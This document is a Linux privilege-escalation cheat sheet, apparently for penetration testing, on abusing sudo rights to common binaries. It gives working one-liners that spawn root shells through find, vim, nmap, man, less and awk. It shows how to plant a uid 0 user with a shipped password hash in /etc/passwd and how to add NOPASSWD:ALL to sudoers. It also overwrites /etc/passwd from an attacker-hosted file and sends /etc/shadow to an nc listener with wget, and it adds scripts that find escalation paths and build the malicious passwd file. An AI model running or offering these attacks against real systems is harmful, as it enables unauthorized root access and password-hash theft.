Exploiting SUDO Users

First things first

To exploit a sudo entry you first need to know which commands you are allowed to run as root (or as another user), and whether a password is required for them:

sudo -l
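As an added example (not code from the original page), the script below parses the output of sudo -l and flags the allowed commands that have an escalation path on this page. The sample sudo -l output, the user "alice" and the host "target" are constructed for illustration; on a real target pipe the live output into parse_sudo_l instead.

```shell
#!/bin/sh
# Added example, not code from the original page: parse `sudo -l` output and
# flag the allowed commands this page shows an escalation for.
# The sample output, user "alice" and host "target" are constructed.

# Binaries covered on this page.
KNOWN_ESCALATIONS="find vim nmap man less more awk nano wget apache2"

# parse_sudo_l: read `sudo -l` output on stdin and print one "TAG /path/cmd"
# line per allowed command, where TAG is NOPASSWD or PASSWD. Rules look like
#     (root) NOPASSWD: /usr/bin/find, /usr/bin/vim
# and follow the "may run the following commands" line.
parse_sudo_l() {
    awk '
        /may run the following commands/ { in_rules = 1; next }
        in_rules && /^[ \t]*\(/ {
            line = $0
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)     # drop the "(root)" run-as part
            tag = (line ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
            while (sub(/^[A-Z!]*:[ \t]*/, "", line)) ;  # drop NOPASSWD:/SETENV:/... tags
            n = split(line, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) {
                split(cmds[i], parts, " ")              # keep the binary, drop fixed args
                print tag, parts[1]
            }
        }
    '
}

# flag_known: keep only the parse_sudo_l lines whose binary is on the list
# above, or is ALL (which needs no trick at all).
flag_known() {
    while read -r tag path; do
        if [ "$path" = "ALL" ]; then
            printf '%s ALL\n' "$tag"
            continue
        fi
        cmd=${path##*/}
        for k in $KNOWN_ESCALATIONS; do
            if [ "$cmd" = "$k" ]; then printf '%s %s\n' "$tag" "$path"; fi
        done
    done
}

# Constructed `sudo -l` output for the demo.
SAMPLE_SUDO_L='Matching Defaults entries for alice on target:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on target:
    (root) NOPASSWD: /usr/bin/find, /usr/bin/vim
    (ALL : ALL) /usr/bin/wget, /usr/sbin/apache2
    (root) /usr/bin/systemctl status'

# escalation_candidates: run the pipeline over the sample. On a target use:
#   sudo -l 2>/dev/null | parse_sudo_l | flag_known
escalation_candidates() {
    printf '%s\n' "$SAMPLE_SUDO_L" | parse_sudo_l | flag_known
}

escalation_candidates
```

The NOPASSWD tag matters more than the binary: a NOPASSWD find entry is an immediate root shell, while a PASSWD entry still needs the current user's password.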

Escalate privileges to root with one of the following, depending on which binary sudo -l lists:

Find

# -exec runs /bin/sh as root once for each match; any path that exists works
sudo find /etc/passwd -exec /bin/sh \;
sudo find /bin -name nano -exec /bin/sh \;

Vim

sudo vim -c '!sh'

Nmap

# Old way: nmap 2.02 to 5.21 shipped an interactive mode (removed in later releases)
sudo nmap --interactive
nmap> !sh
sh-4.1#
# Newer versions: run a Lua NSE script that spawns a shell
echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

Man

sudo man man
# at the pager prompt type !sh and press Enter

Less/More

sudo less /etc/hosts
# type !sh and press Enter
sudo more /etc/hosts
# type !sh and press Enter; more only pauses at a prompt if the file is longer
# than the screen, so pick a long file (e.g. /etc/services) if /etc/hosts is short

awk

sudo awk 'BEGIN {system("/bin/sh")}'

nano

sudo nano /etc/passwd
sudo nano /etc/sudoers

Append the following line to /etc/passwd to add a user with uid 0 and gid 0, i.e. root privileges. The second field is a SHA-512 crypt hash; the one below is the hash this page ships with, and you can generate your own with openssl passwd -6 (or mkpasswd -m sha-512).

user:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
su user
# enter the password that matches the hash

Alternatively, add one of these lines to /etc/sudoers. The first lets user run every command as root without a password; the second still prompts for user's own password. Editing with nano skips the syntax check visudo performs, and a typo here breaks sudo for every account, so prefer sudo visudo when it is available.

user ALL=(ALL) NOPASSWD:ALL
user ALL = (ALL:ALL) ALL

wget

  • Copy the target's /etc/passwd file to the attacker machine.

  • On the attacker machine, add a uid 0 user to that copy by appending this single line (same hash as in the nano section):

  • ayed:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash

  • Host the modified file with any web server, then overwrite the target's /etc/passwd with it (-O truncates the destination first, so make sure the download succeeds):

    sudo wget http://192.168.56.1:8080/passwd -O /etc/passwd
    su ayed

  • Note: the same sudo right also lets you pull files off the target, e.g. root's SSH key or /etc/shadow. Start the listener on the attacker machine first, then POST the file from the target:

nc -lvp 8080
sudo wget --post-file=/etc/shadow 192.168.56.1:8080
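Both the nano and the wget variants above end with a hand-edited /etc/passwd, and a malformed one locks every account out, including the one you were escalating from. The script below is an added example, not code from the original page: it builds the root-equivalent entry with the page's user name "ayed" and the page's hash, and sanity-checks the candidate file before it is written over /etc/passwd. The original passwd content it starts from is constructed for illustration; the plaintext behind the page's hash is not given here, so generate your own with openssl passwd -6 when you use this for real.

```shell
#!/bin/sh
# Added example, not code from the original page: build the uid 0 /etc/passwd
# entry used above and check the resulting file before installing it.
# ORIG_PASSWD is a constructed stand-in for the copy taken from the target.

# passwd_entry NAME HASH -> one /etc/passwd line with uid 0 / gid 0.
# Make a fresh hash with:  openssl passwd -6 'yourpassword'
passwd_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# check_passwd FILE -> exit 0 if every line has 7 colon-separated fields, no
# user name is duplicated and at least one uid 0 entry exists; exit 1 otherwise.
check_passwd() {
    awk -F: '
        BEGIN            { bad = 0; uid0 = 0 }
        NF != 7          { print "bad field count on line " NR; bad = 1 }
        seen[$1]++       { print "duplicate user " $1; bad = 1 }
        $3 == 0          { uid0++ }
        END { if (!uid0) { print "no uid 0 entry"; bad = 1 }; exit bad }
    ' "$1"
}

# Constructed original passwd content (what wget fetched from the target).
ORIG_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash'

# Hash as given on this page; replace with your own openssl passwd -6 output.
HASH='$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0'

# build_passwd NAME HASH -> write the candidate file, print its path and
# return 0 if it passes check_passwd; otherwise delete it and return 1.
# Serve the printed file from the web server used in the wget step.
build_passwd() {
    out=$(mktemp)
    printf '%s\n' "$ORIG_PASSWD" > "$out"
    passwd_entry "$1" "$2" >> "$out"
    if check_passwd "$out"; then
        printf '%s\n' "$out"
    else
        rm -f "$out"
        return 1
    fi
}

build_passwd ayed "$HASH"
```

For the sudoers variant the equivalent check is visudo -c -f FILE on the candidate file before it is copied into place.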

apache

sudo apache2 -f /etc/shadow
# apache2 tries to parse the file as its config, aborts on the first line and
# echoes it in the error message; this leaks only the first entry (normally root's hash)
